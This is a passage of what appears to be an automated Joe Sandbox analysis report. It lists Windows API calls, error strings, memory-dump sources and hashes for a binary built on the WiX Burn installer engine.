• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ErrorEventLastMultipleObjectsResetWait
                                                                                                                                                          • String ID: Failed to reset log event.$Failed to wait for log thread events, signaled: %u.$Failed to wait log message over pipe.$d:\a\wix\wix\src\burn\engine\engine.cpp
                                                                                                                                                          • API String ID: 3117541546-979359555
                                                                                                                                                          • Opcode ID: 82b12ef57d286a6714d2baf942b8aaf9c9bd32228a56724dbfe3d55c8ba4d6db
                                                                                                                                                          • Instruction ID: 2ad97e5346123ddba149f314574b3e0424aaec4d09e24195b983836bf61d01ca
                                                                                                                                                          • Opcode Fuzzy Hash: 82b12ef57d286a6714d2baf942b8aaf9c9bd32228a56724dbfe3d55c8ba4d6db
                                                                                                                                                          • Instruction Fuzzy Hash: FE412B31A40724BBEB207BA28D06F9F7668AF20B15F10417FF644791C1DBBC599086DE
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041ED7F
                                                                                                                                                          • Failed to set last source., xrefs: 0041ED6D
                                                                                                                                                          • Failed to determine length of source path., xrefs: 0041EC80
                                                                                                                                                          • Failed to determine length of relative path., xrefs: 0041ECAA
                                                                                                                                                          • WixBundleLastUsedSource, xrefs: 0041ED1A, 0041ED20, 0041ED5E
                                                                                                                                                          • Failed to trim source folder., xrefs: 0041ED03
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 0-1489649792
                                                                                                                                                          • Opcode ID: 05f28a89d7a944a17f6b4187338f8057aa84ab2c263e7d4d6e90e1c0e1fce1f2
                                                                                                                                                          • Instruction ID: 2c4fc532b024d851301bb95dbf2caec54f9858b0e31bdde6b6b829efe48cdc2a
                                                                                                                                                          • Opcode Fuzzy Hash: 05f28a89d7a944a17f6b4187338f8057aa84ab2c263e7d4d6e90e1c0e1fce1f2
                                                                                                                                                          • Instruction Fuzzy Hash: 09410B31E40216BBDB219A96CC46FDF7E79DB44B21F210267FD14BA1D0E7B49A808798
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(64681479,00000000,00000000,00000004,?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000), ref: 0041B3D1
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 0041B3DC
                                                                                                                                                            • Part of subcall function 0046EEDB: SetNamedPipeHandleState.KERNEL32(0041B403,00000001,00000000,00000000,?,00000000,00000000,?,?,0041B403,00477850), ref: 0046EEF6
                                                                                                                                                            • Part of subcall function 0046EEDB: GetLastError.KERNEL32(?,?,0041B403,00477850), ref: 0046EF00
                                                                                                                                                            • Part of subcall function 00405C1E: WriteFile.KERNEL32(0046EC8C,?,?,00000000,00000000,0046EC90,00000000,00000000,?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?), ref: 00405C43
                                                                                                                                                            • Part of subcall function 00405C1E: GetLastError.KERNEL32(?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?,?,00000000,0046EC8C,0046EC8C,00000000), ref: 00405C4D
                                                                                                                                                            • Part of subcall function 00405174: ReadFile.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0046ECC1,00000000,?,00000008,00000000,?), ref: 00405199
                                                                                                                                                            • Part of subcall function 00405174: GetLastError.KERNEL32(?,?,0046ECC1,00000000,?,00000008,00000000,?,?,?), ref: 004051A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$File$CurrentHandleNamedPipeProcessReadStateWritelstrlen
                                                                                                                                                          • String ID: Failed to read ACK from pipe.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$d:\a\wix\wix\src\burn\engine\burnpipe.cpp
                                                                                                                                                          • API String ID: 64288487-2886315797
                                                                                                                                                          • Opcode ID: ebf12ba17b445bc6b2cd6f78bd68de73436f545e2f9564c4efc98d448839a2fb
                                                                                                                                                          • Instruction ID: 359c8ad8b16cfdf8eaee61de0b70a714035ab242fa93b9d29843b94662e5e77b
                                                                                                                                                          • Opcode Fuzzy Hash: ebf12ba17b445bc6b2cd6f78bd68de73436f545e2f9564c4efc98d448839a2fb
                                                                                                                                                          • Instruction Fuzzy Hash: C431D631E413147BD710EA598C46FEF7AA8DB09B10F20412BFA04FB2D1D3B899418BE9
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0046B079
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0046B085
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0046B174
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046B17F
                                                                                                                                                          Strings
                                                                                                                                                          • failed getNamedItem in XmlGetAttribute(%ls), xrefs: 0046B0E1
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B0B7, 0046B0F0
                                                                                                                                                          • failed get_attributes, xrefs: 0046B0A8
                                                                                                                                                          • failed get_nodeValue in XmlGetAttribute(%ls), xrefs: 0046B11F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed getNamedItem in XmlGetAttribute(%ls)$failed get_attributes$failed get_nodeValue in XmlGetAttribute(%ls)
                                                                                                                                                          • API String ID: 760788290-3149762594
                                                                                                                                                          • Opcode ID: 065ef153bca2c45b574a7080694961f324a1acdc32fd332f05d3a9c3d14fee72
                                                                                                                                                          • Instruction ID: bf2c3060670f320e3a600a552281a1a1305079b4d0aaa949db8656d3325c41e4
                                                                                                                                                          • Opcode Fuzzy Hash: 065ef153bca2c45b574a7080694961f324a1acdc32fd332f05d3a9c3d14fee72
                                                                                                                                                          • Instruction Fuzzy Hash: 1E31DF35B00208BBDB149F94CC59FAE3B79EB85751F10006AF905EB290EB749D80CBD9
APIs
• GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000000,00000105,00000000,00000000,00000000,?,?,?,0040679E,?,00000000,00000000,00000000,0100147D), ref: 004025A2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: Failed to allocate space for current directory.$Failed to get current directory.$Failed to get max length of input buffer.$Failed to reallocate space for current directory.$GetCurrentDirectoryW results never converged.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
• API String ID: 1611563598-3550776927
APIs
• CreateThread.KERNEL32(00000000,00000000,004218F0,00000000,00000000,00000000), ref: 00422BA5
• GetLastError.KERNEL32(?,00421F0E,00000000,00009003,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808), ref: 00422BB9
Strings
Similarity
• API ID: CreateErrorLastThread
• String ID: Failed to actually elevate.$Failed to cache engine to working directory.$Failed to create unelevated logging thread.$Failed to overwrite the %ls built-in variable.$WixBundleElevated$d:\a\wix\wix\src\burn\engine\core.cpp
• API String ID: 1689873465-3977662230
APIs
• QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00444519,00000000,?), ref: 004719F1
• GetLastError.KERNEL32(?,?,00444519,00000000,?,?,?,?,?,?,?,?,?,004449C3,?,?), ref: 004719FF
  • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
  • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
• QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00444519,00000000,?), ref: 00471A56
• GetLastError.KERNEL32(?,?,00444519,00000000,?,?,?,?,?,?,?,?,?,004449C3,?,?), ref: 00471A60
Strings
Similarity
• API ID: ConfigErrorHeapLastQueryService$AllocProcess
• String ID: Failed to allocate memory to get configuration.$Failed to query service configuration.$Failed to read service configuration.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\svcutil.cpp
• API String ID: 36289606-3257316652
APIs
• GetFileAttributesW.KERNEL32(00000000,00000000,?,00000000,00000000,000004A0,000004A0,00000120,00000000,000004A0,00000000,00000120,00000000), ref: 004121F6
• GetLastError.KERNEL32 ref: 00412201
Strings
• d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 004121B7, 00412241
• Failed to initialize file search., xrefs: 004121A5
• Failed to set variable to file search path., xrefs: 0041226A
• Failed to format variable string., xrefs: 004121DF
• Failed while searching file search: %ls, for path: %ls, xrefs: 0041222F
• File search: %ls, did not find path: %ls, xrefs: 00412286
Similarity
• API ID: AttributesErrorFileLast
• String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls$d:\a\wix\wix\src\burn\engine\search.cpp
• API String ID: 1799206407-1422290061
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 004510BB
• ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004510D3
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045111E
• ReleaseMutex.KERNEL32(?), ref: 00451135
• SetEvent.KERNEL32(?), ref: 0045113E
Strings
• d:\a\wix\wix\src\burn\engine\netfxchainer.cpp, xrefs: 004511A1
• Failed to send files in use message from netfx chainer., xrefs: 0045118F
• Failed to get message from netfx chainer., xrefs: 0045115F
Similarity
• API ID: MutexObjectReleaseSingleWait$Event
• String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$d:\a\wix\wix\src\burn\engine\netfxchainer.cpp
• API String ID: 2608678126-3719129989
APIs
• CreateFileW.KERNEL32(?,00000080,00000001,00000000,00000003,00000080,00000000), ref: 0040575D
• GetLastError.KERNEL32 ref: 0040576A
• GetLastError.KERNEL32 ref: 0040577C
Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CreateFile
                                                                                                                                                          • String ID: Attempted to check filename, but no filename was provided$Failed to check size of file %ls by handle$Failed to open file %ls while checking file size$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1722934493-3865078597
APIs
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?), ref: 0046E932
• GetLastError.KERNEL32 ref: 0046E93F
• Sleep.KERNEL32(00000064), ref: 0046E963
• CloseHandle.KERNEL32(?,?,?), ref: 0046E9AD
Strings
Similarity
• API ID: CloseCreateErrorFileHandleLastSleep
• String ID: Failed to allocate name of pipe.$Failed to open parent pipe: %ls$\\.\pipe\%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
• API String ID: 1275171361-2109688770
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00455179
• ___TypeMatch.LIBVCRUNTIME ref: 00455287
• _UnwindNestedFrames.LIBCMT ref: 004553D9
• CallUnexpected.LIBVCRUNTIME ref: 004553F4
Strings
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2751267872-393685449
APIs
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0043BA59
Strings
• BundleVersion, xrefs: 0043BA83
• Failed to parse related bundle package version: %ls, xrefs: 0043BAD1
• BA aborted detect related BUNDLE package., xrefs: 0043BB7F
• d:\a\wix\wix\src\burn\engine\bundlepackageengine.cpp, xrefs: 0043BAA8, 0043BB74, 0043BB79, 0043BB91
• Failed to read version from registry for related bundle package: %ls, xrefs: 0043BA96
• Failed to compare related bundle package version: %ls, xrefs: 0043BB29
Similarity
• API ID: CompareString
• String ID: BA aborted detect related BUNDLE package.$BundleVersion$Failed to compare related bundle package version: %ls$Failed to parse related bundle package version: %ls$Failed to read version from registry for related bundle package: %ls$d:\a\wix\wix\src\burn\engine\bundlepackageengine.cpp
• API String ID: 1825529933-652315071
APIs
• CreateThread.KERNEL32(00000000,00000000,00424D70,00000000,00000000,00000000), ref: 0042997A
• GetLastError.KERNEL32(?,00408A99,?,?,?,?,?,?,?,?,?,?,00000000,?,crypt32.dll,?), ref: 00429986
• CloseHandle.KERNEL32(00000000,00000000,000493E0,?,?,00428840,?,?,?,00408A99,?,?,?,?,?,?), ref: 00429A54
Strings
Similarity
• API ID: CloseCreateErrorHandleLastThread
• String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$Failed to wait for cache thread to complete.$d:\a\wix\wix\src\burn\engine\elevation.cpp
• API String ID: 747004058-3124151470
APIs
  • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
• RegCloseKey.ADVAPI32(00000214,00000120,00000120,00020019,00000214,000004A0,00000120,000001F8,00000120,00000120,?,?,?,0041FCE3,?,?), ref: 0046FA0A
Strings
• Failed to open the registry key for the dependency "%ls"., xrefs: 0046F926
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F9F5
• Failed to get the version for the dependency "%ls"., xrefs: 0046F9E9
• Failed to get the name for the dependency "%ls"., xrefs: 0046F9AC
• Failed to allocate the registry key for dependency "%ls"., xrefs: 0046F8DD
• Failed to get the id for the dependency "%ls"., xrefs: 0046F96F
Similarity
• API ID: Closelstrlen
• String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the id for the dependency "%ls".$Failed to get the name for the dependency "%ls".$Failed to get the version for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
• API String ID: 3903209405-3351240443
Strings
• Failed to check the dictionary of unique dependencies., xrefs: 0041F66C
• Failed to add "%ls" to the string dictionary., xrefs: 0041F6F5
• Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0041F709
• d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041F631, 0041F67E, 0041F71B
• Failed to create the string dictionary., xrefs: 0041F61F
• ALL, xrefs: 0041F6BD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ALL$Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.$d:\a\wix\wix\src\burn\engine\dependency.cpp
                                                                                                                                                          • API String ID: 0-3135785055
                                                                                                                                                          • Opcode ID: 1965e6d05cb54a11c1fec7dbec4ece212789e90ce512297bfb8e8416afa2e0a6
                                                                                                                                                          • Instruction ID: 06b2d7f25587c86374013b8faece8725ef1489168a460c6e32ad1185bc9253c6
                                                                                                                                                          • Opcode Fuzzy Hash: 1965e6d05cb54a11c1fec7dbec4ece212789e90ce512297bfb8e8416afa2e0a6
                                                                                                                                                          • Instruction Fuzzy Hash: 2E310971A8032477E72166558C07FDF3AA49B81F64F200177FA04BA1D1F6B85D8687AD
                                                                                                                                                          APIs
                                                                                                                                                          • CopyFileW.KERNEL32(000007D0,00000003,00000000,00000000,80004005,000000B0,?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8), ref: 00404CBC
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8,00000000,00000000,00000001,00000003,000007D0,00000000), ref: 00404CCA
                                                                                                                                                          • CopyFileW.KERNEL32(000007D0,00000003,00000001,00000003,00000000,?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8,00000000), ref: 00404D6C
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8,00000000,00000000,00000001,00000003,000007D0,00000000), ref: 00404D76
                                                                                                                                                          Strings
                                                                                                                                                          • failed to copy file: '%ls' to: '%ls', xrefs: 00404DA1
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp, xrefs: 00404D58, 00404D95
                                                                                                                                                          • failed to create directory while copying file: '%ls' to: '%ls', xrefs: 00404D49
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CopyErrorFileLast
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to copy file: '%ls' to: '%ls'$failed to create directory while copying file: '%ls' to: '%ls'
                                                                                                                                                          • API String ID: 374144340-3806374778
                                                                                                                                                          • Opcode ID: 1bc0665ffd2310305019f60ed1395e5e9b1fbfc3bf1a5ac1bdd61402040216c8
                                                                                                                                                          • Instruction ID: 8e76adc087b8b200769380e91fd65a08941ae6cac03b3b1fa89665f65cf07a8a
                                                                                                                                                          • Opcode Fuzzy Hash: 1bc0665ffd2310305019f60ed1395e5e9b1fbfc3bf1a5ac1bdd61402040216c8
                                                                                                                                                          • Instruction Fuzzy Hash: 2131D2B6640326A6EB305A658C05FBB6698EFD5B60F11417BFF04FB3D0D6788C4182A9
                                                                                                                                                          Strings
                                                                                                                                                          • Verification secret from bootstrapper application does not match., xrefs: 00414474
                                                                                                                                                          • Failed to write response to pipe., xrefs: 00414445
                                                                                                                                                          • Failed to read size of verification secret from bootstrapper application pipe., xrefs: 0041438A
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp, xrefs: 0041439C, 004143C7, 004143CC, 004143FF, 00414466, 0041446C, 00414482
                                                                                                                                                          • Verification secret from bootstrapper application is too big., xrefs: 004143D2
                                                                                                                                                          • Failed to allocate buffer for bootstrapper application verification secret., xrefs: 004143ED
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                          • String ID: Failed to allocate buffer for bootstrapper application verification secret.$Failed to read size of verification secret from bootstrapper application pipe.$Failed to write response to pipe.$Verification secret from bootstrapper application does not match.$Verification secret from bootstrapper application is too big.$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
                                                                                                                                                          • API String ID: 1948546556-3365579777
                                                                                                                                                          • Opcode ID: 6973ca6a72279edca65946216e7e1e248dc5f60a13a49caab7cd1e3b9ff61466
                                                                                                                                                          • Instruction ID: 0537fb23deeb272aa9968cf1eefaedb3d2c77d98f9349af085424f556e4644df
                                                                                                                                                          • Opcode Fuzzy Hash: 6973ca6a72279edca65946216e7e1e248dc5f60a13a49caab7cd1e3b9ff61466
                                                                                                                                                          • Instruction Fuzzy Hash: 32310971E80328B6DB11AA96CC06FDF7B6CDF40724F608267F918FA1D1D2BC4A41969C
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp,0000011E,80070057,?,00000000,?,?), ref: 0047190A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: An invalid parameter was passed to the function.$Failed to locate and query bundle variable.$Failed to read string shared variable.$Reading bundle variable of type 0x%x not implemented.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp$variables
                                                                                                                                                          • API String ID: 3535843008-1397461789
                                                                                                                                                          • Opcode ID: 492a6cc713410b3b9ad99a5543b3da441836b2fb9a3aa62653a54fa7ff36c438
                                                                                                                                                          • Instruction ID: a93da0c0c78be28e86ee29040ab150c772002e71a31226e90ba2f190fa2444a2
                                                                                                                                                          • Opcode Fuzzy Hash: 492a6cc713410b3b9ad99a5543b3da441836b2fb9a3aa62653a54fa7ff36c438
                                                                                                                                                          • Instruction Fuzzy Hash: 84315972E40219F7DB215D9D8C85FEF7A39EB41714F11807BFA08BA2A1D27D8E10C699
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to allocate memory for message.$Failed to calculate total pipe message size$Pipe message is too large.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
                                                                                                                                                          • API String ID: 0-1395197448
                                                                                                                                                          • Opcode ID: 5f47e6ae56d99a80711aafda55421de0020ac255769dec215d0162df412683d6
                                                                                                                                                          • Instruction ID: 4e92e026c814703ab827daf883cb01fb6bfca96c025e0d3d1d0c9e53e325ab50
